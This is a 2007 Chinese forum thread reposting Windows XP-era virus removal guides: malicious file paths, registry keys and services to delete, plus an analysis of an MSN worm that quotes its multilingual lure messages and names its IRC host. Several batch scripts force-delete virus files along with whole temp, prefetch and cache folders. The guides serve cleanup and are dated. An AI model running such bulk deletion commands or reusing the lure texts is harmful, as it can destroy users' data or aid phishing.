C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\system32\upxdnd.dll
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\windds32.dll
C:\WINDOWS\system32\ctfnom.exe
c:\windows\BOOT-hf.exe
C:\WINDOWS\uninstall\rundl132.exe
C:\Program Files\Common Files\System\terebmi.exe
C:\Program Files\Common Files\Microsoft Shared\MSINFO\SysWFGQQ2.dll
C:\Program Files\Common Files\Microsoft Shared\nuygtvw.exe
C:\WINDOWS\upxdnd.exe
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\cmdbcs.exe
C:\WINDOWS\mppds.exe
C:\WINDOWS\Config\svhost32.exe
C:\DOCUME~1\new\LOCALS~1\Temp\mhs2.exe
C:\DOCUME~1\new\LOCALS~1\Temp\rxzs.exe
C:\DOCUME~1\new\LOCALS~1\Temp\wlzs.exe
C:\DOCUME~1\new\LOCALS~1\Temp\zts2.exe

5、下载使用autorun专杀及免疫工具最终完美版.（2楼已给出）

出处：http://hi.baidu.com/peaset/   (非常感谢作者的无私奉献)




[ 本帖最后由 幸运的西瓜 于 2007-8-22 00:06 编辑 ]

SVCH0ST.exe trtbc.dll licmon.exe病毒清除办法

清除步骤:
1、关闭系统还原(Win2000系统可以忽略）：右键"我的电脑"—>属性—>系统还原—>"在所有驱动器上关闭系统还原" 打勾即可。
            清除IE的临时文件：打开IE 点工具—>Internet选项—>Internet临时文件—>点“删除文件”按钮—>将 "删除所有脱机内容" 打勾—>点"确定"。

2、显示“受保护的操作系统文件”
使用unlocker删除以下文件：
C:\WINDOWS\system32\SVCH0ST.exe
C:\WINDOWS\system32\trtbc.dll
C:\WINDOWS\system32\licmon.exe
3、用SRE修改注册表,删除以下键
<ravshell><C:\WINDOWS\system32\SVCH0ST.exe>
<SearchNet_Up>
<><C:\WINDOWS\system32\trtbc.dll>

4、用SRE删除下面这个服务：
License Monitor Service / LicenseMonitor

5、用SRE修复文件关联。

6、重启计算机，病毒清除完毕。

出处：http://hi.baidu.com/peaset/   (非常感谢作者的无私奉献)

[ 本帖最后由 幸运的西瓜 于 2007-8-9 01:55 编辑 ]

MSN病毒 photos.zip病毒 syshosts.dll清除办法

病毒名称：Backdoor.Win32.IRCBot.aaq（Kaspersky）
病毒别名：Worm.Mail.Photocheat.a（瑞星）
　　　　　 Worm.MsnBot.h（毒霸）

行为分析：
病毒通过MSN传播，伪装成照片压缩包发送给MSN上的联系人，诱使联系人接收打开病毒。病毒通过ShellServiceObjectDelayLoad加载实现自启动。

病毒运行后在系统目录生成包含有自身副本的ZIP压缩文件：
%Windows%\photos.zip
其中包含的病毒副本文件名是photos album-2007-5-26.scr。

释放一个dll文件注入进程：
%System%\syshosts.dll

在注册表创建ShellServiceObjectDelayLoad启动方式：
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"syshosts"="{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}"

[HKEY_CLASSES_ROOT\CLSID\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}\InProcServer32]
@="syshosts.dll"

注：{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}为一串CLSID，病毒产生的这段CLSID不固定，如：{B6E52B7E-4AF1-467F-9F8D-D087AFEBA89A}

向MSN联系人发送信息：
——————————————————————————————————————
Here are my private pictures for you
Here are my pictures from my vacation
My friend took nice photos of me.you Should see em loL!
its only my photos!
Nice new photos of me and my friends and stuff and when i was young lol...
Nice new photos of me!! :p
Check out my sexy boobs :D
hey regarde mes tof!! :p
ma soeur a voulu que tu regarde ca!
hey regarde les tof, c'est moi et mes copains entrain de.... :D
j'ai fais pour toi ce photo album tu dois le voire :)
tu dois voire ces tof
mes photos chaudes :D
c'est seulement mes tof :p
zijn enige mijn foto's
wanna Hey ziet mijn nieuw fotoalbum?
Hey be
indigde enkel nieuw fotoalbum! :)
hey keurt mijn nieuw fotoalbum goed.. :p
het voor yah, doend beeldverhaal van mijn leven lol..
meine hei
en Fotos ! :p
le mie foto calde :p
mis fotos calientes
mi fotograf
as :p
Mi amigo tom
las fotos agradables de m
mis fotos calientes
el lol mi hermana quisiera que le enviara este
album de foto
——————————————————————————————————————
同时将%Windows%\photos.zip发送给联系人。

病毒还会尝试连接远程IRC：www.free8.biz


清除办法：
1、开始--运行--regedit，打开注册表，点注册表中的"我的电脑"—>点"编辑"—>查找，输入syshosts ，找到的项目就点右键--删除，按F3继续，直到查找完毕.

2、重新启动计算机

3、删除病毒文件：
C:\Windows\photos.zip
C:\Windows\System32\syshosts.dll

4、完毕。

出处：http://hi.baidu.com/peaset/   (非常感谢作者的无私奉献)

[ 本帖最后由 幸运的西瓜 于 2007-8-9 01:56 编辑 ]

Kavs0.dll 、Servera.exe病毒清除办法

清除步骤：
1、开始--运行--regedit，打开注册表，点注册表中的"我的电脑"—>点"编辑"—>查找，输入Servera.exe，找到的项目就点右键--删除，按F3继续，直到查找完毕.

2、重新启动计算机；

3、删除以下文件：
C:\DOCUME~1\用户名\LOCALS~1\Temp\Servera.exe
C:\DOCUME~1\用户名\LOCALS~1\Temp\Kavs0.dll

4、完毕。

出处：http://hi.baidu.com/peaset/   (非常感谢作者的无私奉献)

[ 本帖最后由 幸运的西瓜 于 2007-8-9 01:57 编辑 ]

Run a DLL as an App 病毒 rundll.exe、autorun.inf 清除办法

现象描述：使用U盘后系统速度明显变慢
病毒文件：rundll16.exe 、rundll.exe

清除办法：
1、将下列红色虚线中的代码复制到记事本保存后将扩展名改为.bat 并命名为1.bat，放到桌面。
---------------------------------------------------------------------------------------------------------
@echo off
echo Windows Registry Editor Version 5.00>alpha.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]>>alpha.reg
echo "Run a DLL as an App"=->>alpha.reg
echo "System"=->>alpha.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]>>alpha.reg
echo "Userinit"="C:\\WINDOWS\\system32\\userinit.exe,">>alpha.reg
regedit /s alpha.reg
del /f /q alpha.reg
cls & echo 请重新启动计算机，然后运行2.bat & pause
---------------------------------------------------------------------------------------------------------

2、将下列红色虚线中的代码复制到记事本保存后将扩展名改为.bat 并命名为2.bat，放到桌面。
---------------------------------------------------------------------------------------------------------
@echo off
attrib -h -r -s -a %windir%\system32\rundll16.exe
attrib -h -r -s -a %windir%\system32\rundll.exe
attrib -h -r -s -a %windir%\system32\c_10083.nls
del /f /q %windir%\system32\c_10083.nls
del /f /q %windir%\system32\rundll16.exe
del /f /q %windir%\system32\rundll.exe
for %%i in (c d e f g h i j k) do del /f/q/as %%i:\autorun.inf & del /f/q/as %%i:\rundll.exe
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
del /f /s /q %windir%\Prefetch\*.*
del /f /s /q %windir%\temp\*.*
cls & echo 病毒清除完毕。 & pause
---------------------------------------------------------------------------------------------------------

3、运行1.bat

4、重新启动计算机，运行2.bat ，完毕。

最新更新：
目前该病毒变种会感染系统rundll32.exe，现象就是无法打开控制面板里的任何项目，解决办法是升级病毒库到最新查杀，已知avast可以成功清除此病毒并修复系统文件。

出处：http://hi.baidu.com/peaset/   (非常感谢作者的无私奉献)

[ 本帖最后由 幸运的西瓜 于 2007-8-9 02:00 编辑 ]

crs.exe病毒清除办法

病毒文件：crs.exe
病毒特征：在进程中结束该进程后马上再生

清除步骤：SREng的下载及使用方法     Iceword v1.20下载及简单介绍（楼上已给出）
1、打开SREng，备用；

2、打开IceSword禁止进程创建：（文件——设置——禁止进程创建）

3、用IceSword结束病毒进程：C:\WINDOWS\system32\crs.exe

4、用IceSword删除病毒文件：C:\WINDOWS\system32\crs.exe

5、用SRE修复注册表： 将shell的键值由Explorer.exe crs.exe改为Explorer.exe

6、取消IceSword的“禁止进程创建”。

7、重新启动计算机，清除完毕。

【注意】
已经发现该病毒的变种，其变种相当复杂，生成多个服务类（一般2—4个），并且名称不断变化，其病毒文件在SRE日志中看是伪microsoft属性，其中的一个服务运行后释放出同名DLL注入多个进程，普通用户难以识别清除，期盼杀毒软件公司重视此病毒。

出处：http://hi.baidu.com/peaset/   (非常感谢作者的无私奉献)

[ 本帖最后由 幸运的西瓜 于 2007-8-9 02:02 编辑 ]

rundllfromwin2000.exe病毒清除办法

清除步骤：
1、打开任务管理器，结束进程rundllfromwin2000.exe

2、开始--运行--regedit，打开注册表，点注册表中的"我的电脑"—>点"编辑"—>查找，输入rundllfromwin2000.exe，找到的项目就点右键--删除，按F3继续，直到查找完毕.

3、用unlocker删除文件：C:\WINDOWS\SYSTEM32\RUNDLLFROMWIN2000.EXE

4、重新启动计算机，病毒清除完毕。

出处：http://hi.baidu.com/peaset/   (非常感谢作者的无私奉献)

[ 本帖最后由 幸运的西瓜 于 2007-8-9 02:17 编辑 ]

rundll2000.exe病毒清除办法

清除步骤：

1、打开任务管理器，结束进程rundll2000.exe

2、开始--运行--regedit，打开注册表，点注册表中的"我的电脑"—>点"编辑"—>查找，输入rundll2000.exe ，找到的项目就点右键--删除，按F3继续，直到查找完毕.

3、用unlocker删除文件：C:\WINDOWS\SYSTEM32\RUNDLL2000.EXE

4、重新启动计算机，病毒清除完毕。

出处：http://hi.baidu.com/peaset/   (非常感谢作者的无私奉献)

[ 本帖最后由 幸运的西瓜 于 2007-8-9 02:17 编辑 ]

AUT0CHK.PIF Rpcs.exe wmid.exe IEXPLORE.Sys IEXPLORE.Dat svrhost.exe Kernel32.exe kl.exe

案例来源：http://forum.xilu.com/msg/peaset/f/173.html
这是一堆超级超级变态的病毒，隐藏进程5个，连接网络下载病毒程序到本地执行，因此，清除过程必须严谨，请看清楚后再操作。

一、准备工作：
SRE的下载和使用方法见和IceSword下载和使用方法见楼上都已说明。

_____________________________________________________________________

二、清除步骤：
1、关闭系统还原(Win2000系统可以忽略）：右键"我的电脑"—>属性—>系统还原—>"在所有驱动器上关闭系统还原" 打勾即可。
    清除IE的临时文件：打开IE 点工具—>Internet选项—>Internet临时文件—>点“删除文件”按钮—>将 "删除所有脱机内容" 打勾—>点"确定"。

2、用IceSword禁止进程创建：文件——设置——勾选“禁止进程创建”。

3、用IceSword结束所有红色的隐藏进程。

4、用SRE删除以下注册表项（如果有的话）：

<rffeuv><C:\DOCUME~1\Skunk\LOCALS~1\Temp\servicer.exe>
<load><C:\WINDOWS/system32/AUT0CHK.PIF>
<CoolSwitch><C:\WINDOWS\system32\taskswitch.exe>
<Cmaudio><RunDll32 cmicnfg.cpl,CMICtrlWnd>
<Hupoo><"C:\WINDOWS\system32\Hupoo.exe " >
<ltnward><C:\WINDOWS\system32\ltnward.exe>
<svrhost><C:\WINDOWS\system32\svrhost.exe>
<kernel32><C:\WINDOWS\Kernel32.exe>
<><C:\Program Files\Common Files\Microsoft Shared\MSClientDataMgr\MsInfo.Dll>
<><C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys>
<><C:\Program Files\Internet Explorer\IEXPLORE.Sys>  
<><C:\Program Files\Internet Explorer\IEXPLORE.Dat>
<><C:\Program Files\Internet Explorer\IEXPLORE.win>

5、用SRE删除以下服务项（如果有的话）：

Cryptographic Machine / ClipArt
DCOM Server Process Launher / DC0r
Microsoft Update Service / BRGNS2
sdffgcb24345 / dsfg3
Windows Management Instrumentation Driver / WMID
Remote Procedure Call System(RPCS) / RpcS
Remote Procedure Call System(RPCS1) / RpcS1

6、用SRE删除以下驱动项（如果有的话）：

00 / 00
sptd / sptd
bffcdeig / bffcdeig
caibbgif / caibbgif
paraudio / paraudio
vaxscsi / vaxscsi
WINIO / WINIO

7、用SRE删除以下BHO（如果有的话）:

IEMonitor Class

8、用IceSword删除以下文件或者文件夹（如果有的话）：

C:\WINDOWS\system32\kl.exe
C:\WINDOWS\system32\s3fvod.exe
C:\WINDOWS\SYSTEM32\WBEM（这个文件夹全删）
C:\WINDOWS\system32\wmid.exe
C:\WINDOWS\system32\Rpcs1.exe
C:\WINDOWS\system32\Rpcs.exe
C:\Program Files\DeskAdTop （这个文件夹全删）
C:\WINDOWS\System32\drivers\9024781.sys
C:\WINDOWS\system32\drivers\bffcdeig.sys
C:\WINDOWS\system32\drivers\caibbgif.sys
C:\WINDOWS\system32\drivers\paraudio.sys
C:\WINDOWS\System32\Drivers\sptd.sys
C:\WINDOWS\System32\Drivers\vaxscsi.sys
E:\Tencent\253396804\MyRecvFiles\winio.sys
C:\DOCUME~1\Skunk\LOCALS~1\Temp\TmpD.tmp.rom
C:\DOCUME~1\Skunk\LOCALS~1\Temp\servicer.exe
C:\WINDOWS/system32/AUT0CHK.PIF
C:\WINDOWS\system32\taskswitch.exe
C:\WINDOWS\system32\Hupoo.exe
C:\WINDOWS\system32\ltnward.exe
C:\WINDOWS\system32\svrhost.exe
C:\WINDOWS\Kernel32.exe
C:\WINDOWS\system32\cmicnfg.cpl
C:\Program Files\Common Files\Microsoft Shared\MSClientDataMgr\MsInfo.Dll
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys
C:\Program Files\Internet Explorer\IEXPLORE.Sys
C:\Program Files\Internet Explorer\IEXPLORE.Dat
C:\Program Files\Internet Explorer\IEXPLORE.win
C:\WINDOWS\system32\drivers\etc\hosts （这个文件被病毒利用来屏蔽百度搜索）
C:\WINDOWS\System32\drivers\(这个目录里的凡是以纯数字命名的文件全删)
—————————————————————————————————————


最后重新启动电脑。病毒就被搞定了！
-------------------------------------------------------------------------------------------------------------------------------

出处：http://hi.baidu.com/peaset/   (非常感谢作者的无私奉献)

[ 本帖最后由 幸运的西瓜 于 2007-8-9 02:21 编辑 ]

SVCH0ST.EXE yqr.exe mhso.exe TIMPLATF0RM.exe wgs3.exe Updaterun.exe IEINFO5.sys isignup.sys

案例来源：http://hi.baidu.com/ceci44399258 ... a7b12e06088bf3.html

SRE的下载和使用方法见和如何查看隐藏文件和unlocker的下载和使用方法见楼上都说了。
_______________________________________________________________________________

首先，清除IE的临时文件：打开IE 点工具—>Internet选项—>Internet临时文件—>点“删除文件”按钮—>将 "删除所有脱机内容" 打勾—>点"确定"。


用SRE删除以下注册表项：
<rav